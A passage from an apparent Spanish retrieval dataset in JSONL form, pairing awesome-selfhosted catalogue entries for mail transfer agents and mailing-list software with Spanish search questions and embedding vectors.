primarily with security in mind [MIT/LGPL-2.1, C/deb].", "indexar": "con que puedo montar un servidor de correos seguro que funcione con clientes remotos", "v": [0.11538, 0.03515, -0.2257, -0.08467, -0.01312, -0.05426, 0.08718, -0.02141, -0.08492, -0.11349, -0.07329, -0.0479, 0.22081, -0.04997, 0.16452, -0.00012, 0.11643, 0.02848, -0.01559, 0.04471, 0.08784, -0.08404, -0.0143, -0.0092, -0.05866, 0.01585, 0.09975, -0.03684, -0.04322, 0.02712, 0.11002, -0.05254, 0.04535, 0.00924, 0.04484, -0.04831, -0.03273, 0.13395, -0.00472, -0.00855, 0.12752, -0.01988, -0.14067, -0.0502, -0.03103, -0.00592, 0.01828, -0.09159, 0.05955, -0.01065, -0.03817, -0.1127, -0.12475, -0.05319, -0.06962, 0.04252, 0.17494, -0.06123, 0.12623, -0.03448, -0.03586, 0.04398, 0.05189, 0.06609, 0.05914, -0.10138, -0.00493, -0.1005, -0.15319, -0.08191, -0.09497, -0.00708, -0.01742, -0.00265, -0.01923, 0.0529, -0.03939, 0.0145, -0.00375, 0.08046, -0.00255, -0.02611, -0.04112, 0.0128, -0.15016, -0.11792, -0.01257, -0.03388, -0.0139, -0.06191, 0.09846, -0.00083, -0.04996, 0.0856, -0.02323, -0.01537, 0.02031, -0.01245, -0.04067, 0.03358, -0.02024, 0.1026, -0.01847, 0.111, -0.0075, 0.03808, 0.10651, -0.03914, 0.09948, -0.0335, -0.00667, -0.0104, -0.03613, -0.05549, -0.10328, -0.1183, -0.0541, -0.01998, 0.06109, 0.03694, -0.08463, 0.02854, 0.07608, 0.06911, 0.05954, -0.06585, -0.00747, 0.07236, -0.01675, 0.00979, -0.05936, -0.03108, -0.06892, -0.04851, -0.01796, 0.04599, -0.04566, -0.07295, -0.03128, -0.05379, 0.03188, 0.03383, -0.00916, -0.02861, 0.09328, 0.04196, 0.05539, -0.05512, -0.1001, 0.03034, 0.02066, 0.00734, -0.047, 0.03293, -0.09249, 0.01482, 0.0318, -0.13119, 0.0297, 0.09521, 0.02397, 0.06309, 0.03686, 0.06998, 0.0051, -0.04821, -0.03384, 0.01747, 0.05042, 0.05155, -0.11679, 0.0525, 0.01981, -0.07011, -0.01527, 0.00215, -0.06905, 0.0142, 0.04601, -0.00186, -0.0779, 0.05285, -0.01395, -0.00845, -0.03003, 0.00234, 0.01525, -0.00074, 0.01903, 0.02712, 0.013, -0.00012, -0.06515, 0.04876, -0.02706, -0.06478, -0.06106, -0.04664, -0.02929, -0.02459, -0.04492, -0.04995, 0.00679, -0.04096, 0.03436, -0.00291, -0.05437, 0.09165, 0.00199, 0.08118, 0.03346, -0.08755, 0.10793, -0.0509, -0.02076, -0.00333, 0.04116, -0.07602, -0.02359, 0.02944, -0.01072, -0.00257, 0.01615, -0.01919, -0.01004, 0.03433, 0.04319, 0.04626, 0.07565, -0.00363, -0.00909, 0.05447, -0.04394, -0.05281, 0.04836, 0.02492, 0.0642, -0.0732, -0.04314, -0.04326, 0.02682, 0.07536, -0.01194, -0.03571, -0.01268, -0.08852, -0.1056, 0.03836, -0.04651, -0.02167, -0.03788, -0.01587, 0.01064, -0.02204, 0.01906, -0.04935]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Transfer Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Transfer Agents", "tema": "communication - email - mail transfer agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Transfer Agents: chasquid β€” SMTP (email) server with a focus on simplicity, security, and ease of operation [Apache-2.0, Go]. Courier MTA β€” Fast, scalable, enterprise mail/groupware server providing ESMTP, IMAP, POP3, webmail, mailing list, basic web-based calendaring and scheduling services [GPL-3.0, C/deb]. DragonFly β€” A small MTA for home and office use. Works on Linux and FreeBSD [BSD-3-Clause, C]. EmailRelay β€” A small and easy to configure SMTP and POP3 server for Windows and Linux [GPL-3.0, C++]. Exim β€” Message transfer agent (MTA) developed at the University of Cambridge [GPL-3.0, C/deb]. Haraka β€” Fast, highly extensible, and event driven SMTP server [MIT, Nodejs]. OpenSMTPD β€” Secure SMTP server implementation from the OpenBSD project [ISC, C/deb]. OpenTrashmail β€” Complete trashmail solution that exposes an SMTP server and has a web interface to manage received emails. Works with multiple and wildcard domains and is fully file based (no database needed). Includes RSS feeds and JSON API [Apache-2.0, Python/PHP/Docker].", "indexar": "que servidor de correo tiene una interfaz web para administrar correos como OpenTrashmail?", "v": [0.04451, 0.02027, -0.04072, -0.13946, 0.02555, -0.06873, 0.04883, -0.07121, -0.01215, -0.01078, -0.0427, -0.07834, 0.17789, -0.05551, 0.12969, 0.00569, 0.21208, 0.04757, 0.00947, -0.01874, 0.05046, 0.06293, -0.08481, 0.0067, -0.11243, -0.00542, 0.02759, -0.06091, -0.03099, -0.02088, 0.02277, -0.15036, 0.01005, 0.03909, 0.04679, 0.0577, 0.01406, 0.10639, -0.05138, 0.0649, 0.06891, 0.00071, -0.13258, 0.11398, 0.01925, -0.02905, -0.00971, 0.00063, 0.05192, -0.00988, -0.07463, -0.1634, -0.14785, 0.0073, -0.0043, 0.07709, 0.14521, -0.17184, 0.08708, -0.06588, -0.11553, 0.07818, 0.03458, 0.06994, -0.0374, -0.06094, -0.04457, -0.07844, -0.15461, 0.0102, 0.03385, 0.06655, -0.04979, -0.00621, 0.00508, 0.05103, -0.06224, 0.05669, 0.00723, 0.14627, 0.05394, -0.06484, -0.02511, 0.06037, -0.12095, -0.14181, -0.01342, -0.06528, -0.04411, -0.07514, 0.08673, 0.01822, -0.12059, 0.08711, -0.01137, -0.0355, -0.05101, -0.05209, -0.03393, 0.05509, 0.0079, 0.08909, -0.12188, 0.09861, -0.07381, 0.06648, 0.07617, -0.04955, 0.09073, 0.03633, 0.02382, -0.06369, 0.04826, -0.00631, -0.06491, -0.10179, -0.009, -0.06813, 0.03982, -0.06074, -0.04039, -0.01692, 0.03606, 0.0892, 0.01203, -0.10106, 0.00756, -0.00549, 0.00718, 0.03046, -0.06735, -0.05712, -0.11967, -0.01203, 0.02508, 0.0336, -0.08521, -0.05739, -0.00847, -0.0529, 0.00656, 0.03849, -0.00448, -0.04789, 0.07082, 0.04725, 0.02498, -0.09701, -0.17551, -0.02213, 0.02802, -0.04844, 0.00403, 0.03609, -0.09539, -0.02186, 0.03535, -0.11199, -6e-05, 0.03406, -0.01892, 0.04091, 0.00845, 0.10718, 0.00391, -0.0484, -0.07075, 0.07637, 0.01405, 0.06195, -0.04497, 0.05886, 0.00889, -0.01761, -0.0097, -0.02325, -0.00869, -0.01602, 0.01149, 0.01976, -0.02898, 0.04789, -0.00395, 0.01142, -0.12617, -0.0009, 0.00577, 0.00136, -0.02883, 0.05358, 0.01081, 0.04801, -0.01354, 0.04351, -0.00093, -0.00922, -0.0487, -0.07244, -0.06619, -0.02137, 0.00301, -0.03963, -0.02104, -0.06776, -0.035, 0.02204, -0.0689, 0.02203, -0.04352, 0.06727, 0.02135, -0.04496, 0.06131, -0.02535, -0.01807, -0.00633, 0.06306, -0.03788, 0.00648, -0.01132, -0.03426, 0.00999, -0.01115, -0.06067, 0.03652, 0.00305, -0.01108, 0.06615, 0.05921, 0.01529, -0.00466, 0.05046, -0.04024, -0.0396, 0.04432, -0.01373, 0.05543, -0.08787, 0.00898, -0.03986, 0.02217, 0.04587, -0.03267, 0.01102, 0.02426, -0.08232, -0.08256, 0.00269, -0.09752, -0.02394, -0.06752, -0.00322, 0.0083, -0.00296, 0.00908, -0.004]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Transfer Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Transfer Agents", "tema": "communication - email - mail transfer agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Transfer Agents: chasquid β€” SMTP (email) server with a focus on simplicity, security, and ease of operation [Apache-2.0, Go]. Courier MTA β€” Fast, scalable, enterprise mail/groupware server providing ESMTP, IMAP, POP3, webmail, mailing list, basic web-based calendaring and scheduling services [GPL-3.0, C/deb]. DragonFly β€” A small MTA for home and office use. Works on Linux and FreeBSD [BSD-3-Clause, C]. EmailRelay β€” A small and easy to configure SMTP and POP3 server for Windows and Linux [GPL-3.0, C++]. Exim β€” Message transfer agent (MTA) developed at the University of Cambridge [GPL-3.0, C/deb]. Haraka β€” Fast, highly extensible, and event driven SMTP server [MIT, Nodejs]. OpenSMTPD β€” Secure SMTP server implementation from the OpenBSD project [ISC, C/deb]. OpenTrashmail β€” Complete trashmail solution that exposes an SMTP server and has a web interface to manage received emails. Works with multiple and wildcard domains and is fully file based (no database needed). Includes RSS feeds and JSON API [Apache-2.0, Python/PHP/Docker].", "indexar": "cual es la mejor alternativa gratuita a un servidor SMTP empresarial como Courier?", "v": [-0.17774, -0.09549, -0.10249, -0.13256, -0.04107, -0.1709, 0.07064, -0.09465, -0.12073, -0.01986, -0.06219, 0.03674, 0.14151, -0.07637, 0.04178, 0.04854, 0.18708, -0.18031, 0.17926, 0.00326, 0.13606, 0.05987, -0.00972, -0.08825, -0.07325, 0.00619, -0.07931, -0.08119, -0.01604, 0.03824, 0.07049, -0.00896, 0.05945, -0.03792, 0.0015, -0.01928, 0.04883, 0.09507, 0.01074, -0.03156, 0.11744, -0.06919, 0.0158, 0.04513, 0.04059, -0.00904, -0.02624, -0.06058, 0.04578, -0.02281, -0.10981, -0.00152, -0.07203, -0.08605, -0.0212, 0.09455, 0.05244, -0.11046, -0.03735, -0.07357, -0.02448, 0.08179, -0.09581, -0.04092, -0.01645, -0.00154, -0.07232, -0.0756, -0.07125, -0.05468, -0.0268, -0.00076, -0.01965, -0.05569, -0.02243, 0.05629, 0.03406, 0.05256, 0.04958, 0.16111, 0.10799, -0.02348, -0.01876, 0.11528, -0.14523, -0.12439, -0.00415, -0.0081, -0.00915, -0.00015, 0.02072, 0.06699, -0.03732, 0.10215, -0.0622, -0.12441, 0.13042, -0.03323, -0.03929, 0.01361, 0.03805, 0.10766, -0.10948, -0.01421, 0.01188, 0.04634, -0.01578, -0.03062, 0.03266, -0.01469, -0.0618, -0.02325, 0.0006, 0.02905, -0.05833, -0.136, -0.03288, -0.03693, -0.02749, 0.02295, -0.02513, -0.05501, 0.00977, -0.05254, 0.00174, -0.00947, 0.15327, 0.0298, 0.02518, -0.05019, 0.00083, -0.03004, -0.05678, -0.06765, -0.06818, -0.04274, 0.06738, -0.03029, -0.03025, -0.02267, 0.00947, 0.02536, -0.04019, -0.01606, 0.06434, -0.04337, 0.09501, -0.10359, -0.03612, 0.05053, 0.01289, -0.01836, -0.07021, 0.02432, -0.05975, 0.00029, -0.02945, -0.08474, -0.02834, 0.16495, 0.07615, -0.04656, 0.01178, 0.05958, -0.0316, -0.07938, -0.05323, -0.00294, -0.01034, 0.04496, -0.01721, 0.03921, -0.01792, -0.04437, 0.0119, -0.07568, -0.00485, -0.0716, 0.02529, -0.03404, -0.01566, -0.00134, -0.01149, -0.00656, -0.03937, -0.0664, -0.01127, 0.06099, 0.02759, -0.02339, 0.00756, 0.03563, -0.06087, -0.03006, 0.01904, -0.09171, 0.00433, -0.11399, -0.01584, 0.01202, -0.07402, -0.08264, -0.11758, -0.07118, -0.00031, -0.00805, -0.05188, 0.09691, 0.01345, 0.04166, -0.00741, -0.00392, 0.06873, -0.0591, -0.03773, 0.02443, 0.04964, -0.05132, 0.02894, -0.01249, 0.01895, -0.01808, 0.03805, -0.01293, -0.04208, 0.01183, 0.02934, 0.03512, 0.00582, -0.00971, -0.03138, 0.07545, 0.01099, 0.00743, 0.0255, 0.04404, -0.01279, -0.02515, 0.00495, -0.02197, 0.04375, 0.06472, -0.03149, -0.01901, -0.07061, -0.01336, -0.07328, -0.02557, -0.081, -0.02963, -0.01785, -0.01221, -0.00601, 0.00909, -0.0342, -0.00221]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Transfer Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Transfer Agents", "tema": "communication - email - mail transfer agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Transfer Agents: chasquid β€” SMTP (email) server with a focus on simplicity, security, and ease of operation [Apache-2.0, Go]. Courier MTA β€” Fast, scalable, enterprise mail/groupware server providing ESMTP, IMAP, POP3, webmail, mailing list, basic web-based calendaring and scheduling services [GPL-3.0, C/deb]. DragonFly β€” A small MTA for home and office use. Works on Linux and FreeBSD [BSD-3-Clause, C]. EmailRelay β€” A small and easy to configure SMTP and POP3 server for Windows and Linux [GPL-3.0, C++]. Exim β€” Message transfer agent (MTA) developed at the University of Cambridge [GPL-3.0, C/deb]. Haraka β€” Fast, highly extensible, and event driven SMTP server [MIT, Nodejs]. OpenSMTPD β€” Secure SMTP server implementation from the OpenBSD project [ISC, C/deb]. OpenTrashmail β€” Complete trashmail solution that exposes an SMTP server and has a web interface to manage received emails. Works with multiple and wildcard domains and is fully file based (no database needed). Includes RSS feeds and JSON API [Apache-2.0, Python/PHP/Docker].", "indexar": "busco un servicio de transferencia de mensajes ligero y fΓ‘cil de configurar para uso en casa o oficina", "v": [0.10458, 0.06146, -0.23709, -0.12757, 0.00818, -0.16882, -0.0798, -0.03774, -0.04193, -0.13749, -0.16497, -0.11117, -0.00368, -0.0169, -0.0083, -0.03923, 0.06894, 0.03065, 0.02502, -0.01585, 0.01777, 0.08788, -0.02136, 0.09328, -0.0125, -0.00124, 0.10502, -0.19084, -0.11615, 0.09169, 0.10302, -0.04632, 0.08155, 0.01821, 0.03384, -0.01169, -0.01374, 0.07241, 0.0791, 0.04802, 0.15097, 0.02237, -0.01199, 0.05302, 0.03403, -0.07594, 0.11275, 0.0552, 0.0237, -0.04583, -0.06719, -0.19554, -0.13196, 0.01348, -0.12017, 0.0372, 0.17647, -0.12455, 0.07424, -0.05702, -0.01551, -0.02629, -0.00575, 0.10603, 0.07941, -0.00671, -0.01774, -0.05438, -0.05393, -0.00372, 0.01305, 0.08055, -0.01295, 0.01146, 0.03733, 0.10307, -0.12382, 0.03368, 0.03274, 0.07823, 0.03043, -0.04081, -0.12563, 0.03217, -0.10093, -0.09383, 0.044, -0.07421, 0.05445, -0.0346, 0.05219, 0.05609, 0.00388, 0.0202, 0.04218, -0.0227, -0.04237, -0.00555, 0.0364, 0.02357, 0.12495, 0.00205, -0.06705, 0.11199, -0.05829, -0.01556, 0.03633, -0.04575, -0.00195, -0.09764, 0.00659, -0.01934, 0.07016, 0.00463, 0.01939, -0.03431, -0.0017, -0.02186, 0.01677, -0.03694, -0.12853, 0.03637, 0.11331, 0.05696, -0.04375, -0.05864, 0.00968, -0.02357, -0.01522, 0.0723, -0.09031, -0.10529, -0.10729, 0.01058, 0.00948, 0.06069, -0.04259, -0.03369, 0.00412, -0.07681, 0.05396, 0.08922, -0.05862, -0.06645, 0.06196, 0.05429, -0.01982, -0.08854, -0.08329, 0.02876, 0.06703, 0.01679, -0.01713, 0.01235, -0.0189, -0.01292, 0.02192, -0.04859, -0.07696, 0.00212, -0.04891, 0.00542, 0.03123, 0.01131, -0.02382, 0.03752, -0.00977, 0.05347, 0.00334, 0.01387, -0.07897, -0.03067, -0.00869, -0.0424, 0.00736, -0.00316, -0.01615, 0.03706, -0.03713, -0.04416, -0.00948, 0.06436, -0.02395, 0.01173, 0.00907, 0.04778, -0.01998, 0.00995, -0.01002, 0.03106, -0.02897, 0.0192, -0.04725, 0.0311, 0.01103, -0.03032, -0.0839, -0.04726, -0.00055, -0.0745, -0.05608, -0.05183, 0.01928, 0.00962, -0.01072, 0.01089, -0.06576, -0.01466, -0.0674, 0.07315, 0.02011, -0.05425, 0.1384, -0.01102, -0.03487, 0.02034, 0.04346, -0.09017, 0.04784, 0.085, 0.05551, -0.01297, -0.04392, -0.04178, -0.02733, 0.02002, 0.02551, -0.02315, 0.03655, 0.0425, -0.02293, 0.05436, 0.02315, 0.02356, 0.07545, -0.0042, 0.03637, -0.01308, -0.0383, -0.04646, -0.00268, 0.07225, -0.00803, 0.08861, -0.01144, -0.01339, -0.07401, 0.02851, -0.03948, 0.00383, 0.00689, 0.00425, 0.03945, -0.02019, 0.01115, -0.04523]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Transfer Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Transfer Agents", "tema": "communication - email - mail transfer agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Transfer Agents: Postfix β€” Fast, easy to administer, and secure Sendmail replacement [IPL-1.0, C/deb]. Sendmail β€” Message transfer agent (MTA) [Sendmail, C/deb].", "indexar": "que programa sirve como alternativa segura a sendmail para gestionar correos?", "v": [-0.01891, 0.05467, -0.14864, -0.15584, 0.0261, -0.12905, -0.02323, -0.11136, -0.11498, -0.11768, -0.02698, -0.08567, 0.20563, -0.07721, 0.09744, -0.03852, 0.15665, 0.04541, 0.04455, 0.00746, 0.06896, 0.0583, -0.06457, -0.11768, -0.08894, 0.02707, 0.03209, -0.03653, 0.06293, 0.04139, 0.09125, -0.11706, 0.03254, -0.078, 0.01192, 0.16035, 0.03884, 0.06118, 0.02151, 0.01887, 0.02247, -0.00203, -0.06862, 0.02533, -0.00966, -0.04864, 0.03262, 0.01441, 0.03044, -0.02974, -0.10538, -0.11947, -0.08693, -0.02709, 0.02702, 0.02315, 0.06091, -0.15259, -0.01161, -0.10114, -0.03022, 0.03482, 0.07671, 0.10496, 0.02821, -0.02272, 0.0656, -0.08912, -0.24484, -0.00425, 0.03026, -0.01383, -0.01759, 0.03397, -0.09562, -0.05698, -0.02099, 0.12155, -0.04232, 0.10095, 0.02601, -0.06538, 0.02779, 0.02901, -0.05905, -0.12161, -0.0227, -0.08616, -0.08605, -0.09021, 0.04688, -0.03562, -0.05444, 0.11778, -0.0065, -0.01801, -0.03569, -0.05754, -0.05316, 0.08894, 0.01713, 0.02025, -0.10645, 0.10931, -0.07745, 0.05171, 0.03479, 0.00707, 0.09794, 0.05845, -0.09864, -0.01379, 0.04153, -0.01196, -0.05416, -0.04756, -0.01738, -0.05583, 0.06395, -0.04942, -0.11518, 0.03718, -0.00603, 0.0466, 0.1304, -0.04912, -0.00752, 0.0209, -0.01503, 0.12223, -0.06816, -0.0737, -0.06093, -0.02787, -0.05757, -0.05159, -0.08022, -0.05773, 0.00181, -0.05143, -0.02174, 0.1228, 0.01482, -0.0515, 0.01123, 0.00762, 0.00639, -0.0823, -0.03491, -0.00712, 0.02977, -0.02865, -0.03509, 0.07033, -0.07465, -0.01529, 0.02507, -0.06915, -0.05416, 0.08163, -0.01451, 0.00716, -0.00114, 0.09436, 0.00695, -0.06637, 0.01911, 0.05166, -0.04371, 0.09825, -0.03117, 0.08139, 0.06858, -0.03635, -0.02128, -0.0365, 0.03051, -0.01707, 0.03873, 0.04046, -0.04302, 0.06112, 0.04102, 0.02996, -0.04752, -0.04377, -0.01165, 0.04687, 0.00637, 0.06111, -0.02435, 0.02377, -0.0219, 0.0039, -0.0575, -0.01532, -0.04976, -0.10441, -0.05632, -0.0014, -0.02784, -0.01241, 0.02248, 0.00294, -0.01483, 0.06197, -0.06673, 0.05196, 0.02741, 0.08932, 0.02982, -0.03513, 0.04297, 0.02289, -0.02983, -0.03982, 0.02017, 0.02401, 0.00754, 0.04373, -0.03926, -0.04812, -0.03555, -0.01734, -0.03353, -0.00824, 0.01768, 0.08446, 0.00946, 0.01099, 0.0395, 0.03306, -0.00881, 0.02524, 0.04463, -0.03426, 0.0471, -0.06584, 0.01953, -0.06177, 0.00318, 0.02777, -0.01594, 0.04084, -0.01559, 0.0041, -0.10304, 0.03036, -0.06419, 0.03461, -0.0464, 0.01498, -0.01731, 0.02551, 0.04448, 0.00609]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Transfer Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Transfer Agents", "tema": "communication - email - mail transfer agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Transfer Agents: Postfix β€” Fast, easy to administer, and secure Sendmail replacement [IPL-1.0, C/deb]. Sendmail β€” Message transfer agent (MTA) [Sendmail, C/deb].", "indexar": "cual es una opciΓ³n rΓ‘pida y fΓ‘cil de administrar que reemplace a postfix?", "v": [0.00245, 0.20967, -0.18924, 0.02287, 0.16351, -0.0421, 0.05196, -0.07791, -0.18966, -0.04455, -0.07018, -0.18602, -0.01938, -0.02699, 0.14806, -0.00994, -0.00778, -0.00047, 0.04806, 0.01368, -0.00866, -0.028, -0.09959, -0.00617, -0.02236, -0.00879, 0.15626, -0.03168, -0.22094, -0.03824, 0.13626, 0.03298, 0.0657, 0.02488, -0.01775, 0.10031, 0.01929, 0.04362, -0.06004, 0.08277, -0.00338, -0.05248, -0.12432, 0.07746, -0.02122, -0.00017, -0.03373, -0.00537, 0.03045, -0.10376, 0.0179, -0.08516, -0.07186, -0.03351, -0.09925, 0.02006, 0.12512, -0.07067, -0.03823, 0.0376, -0.06278, 0.04365, -0.04337, 0.11984, -0.01649, 0.05842, -0.08689, -0.00927, -0.10129, 0.04928, 0.00889, 0.01895, 0.026, -0.00758, -0.05326, 0.12145, -0.01023, 0.04169, 0.08949, -0.01555, 0.02387, -0.0674, -0.06382, 0.03782, -0.04903, -0.06073, -0.05713, -0.08621, -0.09146, -0.00849, 0.07791, -0.07693, 0.02751, -0.03517, -0.01055, -0.05209, 0.07724, 0.02434, 0.01661, 0.02044, 0.08667, -0.00185, -0.10668, 0.10055, -0.03962, -0.02907, 0.0324, -0.02189, -0.0616, -0.11608, 0.04267, 0.00747, 0.01449, -0.05642, 0.00171, -0.06799, -0.01976, 0.02747, -0.03225, -0.04611, -0.03225, -0.0584, 0.10334, -0.0423, 0.03991, -0.06364, 0.04228, 0.00205, 0.05939, -0.0074, -0.05454, -0.03517, -0.00246, -0.14049, -0.04516, -0.01755, 0.03777, 0.02504, 0.04588, -0.04833, 0.0511, -0.00055, 0.03026, -0.08193, 0.03709, -0.04347, 0.04517, -0.02842, 0.00042, 0.0791, -0.04999, -0.02986, 0.06473, 0.0457, -0.02793, -0.001, 0.0146, -0.05139, -0.04308, 0.0783, -0.01793, -0.0356, 0.0205, 0.06015, -0.00646, -0.04802, -0.08238, -0.01312, 0.02802, 0.01372, -0.03876, 0.03298, -0.06596, 0.03207, 0.00262, -0.0568, -0.08187, -0.08302, 0.09173, 0.03967, 0.00663, 0.00108, -0.04291, 0.06167, -0.05222, -0.03902, 0.04263, 0.06409, 0.0058, 0.02356, 0.07034, -0.01106, -0.02207, -0.00469, -0.02607, -0.05067, -0.04069, -0.11523, -0.00848, 0.02902, -0.06105, -0.04174, -0.07324, -0.07433, 0.05342, -0.05332, -0.07616, 0.04289, -0.04009, 0.05784, -0.00098, 0.0011, 0.0672, 0.03169, -0.06359, -0.07724, 0.05164, -0.05269, 0.01687, -0.00411, 0.05046, 0.0055, 0.03708, -0.03396, -0.00065, 0.00075, 0.01088, 0.05007, -0.00099, 0.0427, -0.01166, -0.01322, -0.06698, -0.07739, 0.10704, -0.00032, 0.08296, -0.08098, -0.05353, -0.04743, 0.07178, 0.04492, -0.01583, -0.0084, -0.00918, -0.01647, -0.12838, 0.08016, -0.06722, -0.08154, -0.05203, 0.00536, 0.05588, -0.06172, 0.04379, -0.06148]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Transfer Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Transfer Agents", "tema": "communication - email - mail transfer agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Transfer Agents: Postfix β€” Fast, easy to administer, and secure Sendmail replacement [IPL-1.0, C/deb]. Sendmail β€” Message transfer agent (MTA) [Sendmail, C/deb].", "indexar": "con quΓ© puedo montar un servidor de transferencia de mensajes mΓ‘s seguro?", "v": [0.03454, 0.12832, -0.16544, -0.10042, -0.13021, -0.07437, -0.05004, -0.07512, -0.0051, -0.10429, -0.1001, 0.02059, 0.12956, -0.04981, 0.03329, 0.12062, 0.16612, 0.00984, 0.07779, 0.05614, 0.15893, -0.04421, 0.03471, -0.11253, -0.05649, 0.06904, 0.03715, -0.03144, -0.07486, 0.00379, 0.08861, -0.02431, 0.11127, 0.03093, 0.02667, -0.01258, 0.01888, 0.13902, 0.00994, 0.03151, 0.06879, -0.02722, -0.05406, -0.02049, -0.02876, -0.06473, 0.04849, -0.01277, 0.11911, -0.06854, 0.00628, -0.05163, -0.13295, -0.01454, -0.09668, 0.05885, 0.17, -0.07805, 0.12632, -0.03603, -0.09597, 0.06629, -0.07541, 0.04279, 0.06814, -0.07303, 0.0041, -0.05455, -0.15795, -0.0213, -0.00327, -0.03095, -0.03474, 0.0427, 0.03002, 0.09296, -0.08038, 0.07196, -0.01762, 0.11113, 0.00371, 0.00457, -0.05946, 0.09405, -0.0445, -0.05157, -0.05526, -0.06088, 0.08524, 0.01062, 0.09237, 0.04979, -0.02042, 0.08541, -0.02594, -0.06777, 0.02055, -0.00766, -0.00516, 0.03215, 0.03183, 0.03437, -0.01133, 0.06813, 0.01483, 0.02295, 0.12188, -0.10214, 0.12443, -0.05864, 0.07159, -0.03985, -0.00332, -0.00728, -0.04175, -0.07091, -0.02115, 0.03116, 0.03249, 0.06341, -0.09632, 0.04854, 0.10128, 0.06237, 0.05218, -0.05754, 0.01823, 0.05304, -0.06953, 0.04182, -0.10117, -0.05198, -0.11487, -0.0679, -0.02246, 0.0476, 0.01437, -0.04372, -0.0309, -0.02567, 0.01812, 0.04663, -0.05919, -0.05381, 0.03668, 0.05439, 0.00817, -0.14686, -0.06539, 0.0372, 0.10173, 0.04203, -0.02559, 0.00328, -0.05803, -0.02316, 0.02872, -0.07362, -0.01649, 0.07392, 0.0159, 0.05586, 0.02621, 0.06715, 0.00935, -0.01203, -0.02218, 0.05874, 0.03292, 0.02698, -0.02528, 0.05726, 0.03217, -0.04007, 0.02297, -0.02537, -0.06272, -0.0322, -0.02348, -0.05703, -0.02915, 0.04063, -0.0334, 0.02912, 0.00842, -0.04058, -0.00529, 0.03872, 0.03639, 0.08929, 0.01739, 0.01853, -0.06754, 0.05999, 0.00695, -0.07737, -0.06308, -0.05305, -0.01167, -0.05091, -0.02166, -0.07065, 0.01975, -0.04484, -0.00537, -0.01843, -0.10048, 0.03924, -0.00322, 0.08337, 0.04159, -0.0604, 0.14973, -0.05331, -0.01993, 0.0194, 0.04664, -0.06382, -0.03633, 0.03196, 0.04769, -0.00697, -0.02079, -0.04345, -0.0386, 0.05566, -0.01055, 0.02961, 0.06118, 0.04184, -0.03272, 0.09359, -0.06312, 0.02133, 0.08864, 0.036, 0.00021, -0.04789, -0.0518, -0.07843, 0.01497, 0.08212, -0.00418, -0.03103, -0.01309, -0.04686, -0.07331, 0.04148, -0.06056, -0.03158, -0.01365, -0.03366, 0.01193, -0.05556, 0.03235, -0.09264]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Mailing Lists and Newsletters", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mailing Lists and Newsletters", "tema": "communication - email - mailing lists and newsletters", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mailing Lists and Newsletters: HyperKitty β€” Access GNU Mailman v3 archives [GPL-3.0, Python]. Keila β€” Reliable and easy-to-use newsletter tool (alternative to Mailchimp and Sendinblue) [AGPL-3.0, Docker]. Listmonk β€” High performance, self-hosted newsletter and mailing list manager with a modern dashboard [AGPL-3.0, Go/Docker]. Mailman β€” Manage electronic mail discussion and e-newsletter lists [GPL-3.0, Python]. Mautic β€” Marketing automation software (email, social and more) [GPL-3.0, PHP]. mlmmj β€” Mailing list management made joyful [MIT, C]. phpList β€” Newsletter and email marketing with advanced management of subscribers, bounces, and plugins [AGPL-3.0, PHP]. Postorius β€” Web user interface to access GNU Mailman [GPL-3.0, Python]. Schleuder β€” GPG-enabled mailing list manager with resending-capabilities [GPL-3.0, Ruby]. Sympa β€” Mailing list manager [GPL-2.0, Perl].", "indexar": "quΓ© programa puedo usar para gestionar listas de correo y boletines sin pagar?", "v": [-0.062, 0.06508, -0.1174, -0.19381, 0.0422, -0.11131, 0.04953, -0.11375, -0.2422, -0.14592, -0.14153, -0.1544, 0.07732, -0.04453, -0.01875, -0.01802, 0.04855, -0.04325, 0.05419, -0.0467, 0.01077, 0.02598, 0.01786, -0.04133, -0.15003, 0.09532, 0.11585, -0.12846, -0.06347, 0.0839, -0.02206, -0.10438, 0.03648, -0.14597, 0.04621, 0.12885, 0.05869, 0.08276, 0.03243, 0.00267, 0.00682, 0.04746, -0.06757, 0.01164, -0.02972, -0.08576, 0.10725, 0.01475, -0.01532, -0.04316, -0.05657, -0.04935, -0.05079, 0.04924, 0.03222, -0.08133, -0.0381, -0.16863, -0.05242, -0.08695, -0.05563, 0.06065, 0.05411, 0.10719, -0.09861, 0.02061, 0.08772, 0.01188, -0.10933, 0.04131, -0.01608, 0.02539, 0.04362, 0.0273, -0.00053, -0.02088, 0.05655, -0.06224, -0.00672, 0.05677, -0.00584, -0.04343, -0.02898, 0.05867, -0.08399, -0.02132, 0.04487, -0.06189, -0.04827, -0.06734, 0.01806, 0.00208, -0.05257, 0.01475, 0.06619, -0.02762, 